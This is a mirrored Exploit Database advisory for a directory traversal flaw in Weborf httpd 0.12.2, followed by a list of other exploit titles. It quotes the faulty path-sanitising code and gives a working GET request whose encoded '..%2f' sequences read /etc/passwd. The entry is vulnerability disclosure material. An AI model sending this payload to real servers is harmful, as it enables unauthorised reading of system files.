weborf 0.12.2 – Directory Traversal

Exploit Database
15 阅读

作者： Rew

日期： 2010-09-07
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/14925/

Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author:	Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability.This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
//Prevents the use of .. to access the whole filesystem<-- ORLY?
strReplace(url,"../",'\0');

replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Stay safe,
Over and Out

last Exploits
weborf 0.12.2 – Directory Traversal的更多信息

KarjaSoft Sami FTP Server 2.0.2 – USER/PASS Remote Buffer Overflow (SEH)：
AjaXplorer – ‘checkInstall.php’ Remote Command Execution (Metasploit)：
Jenkins CI Script Console – Command Execution (Metasploit)：
Exagate WEBPack Management System – Multiple Vulnerabilities：
Microsoft Windows – ‘NetAPI32.dll’ Code Execution (Python) (MS08-067)：
HP System Management Homepage – ‘RedirectUrl’ Open Redirection：
MailCarrier 2.51 – POP3 ‘USER’ Buffer Overflow：
Microsoft Windows – OLE Remote Code Execution ‘Sandworm’ (MS14-060)：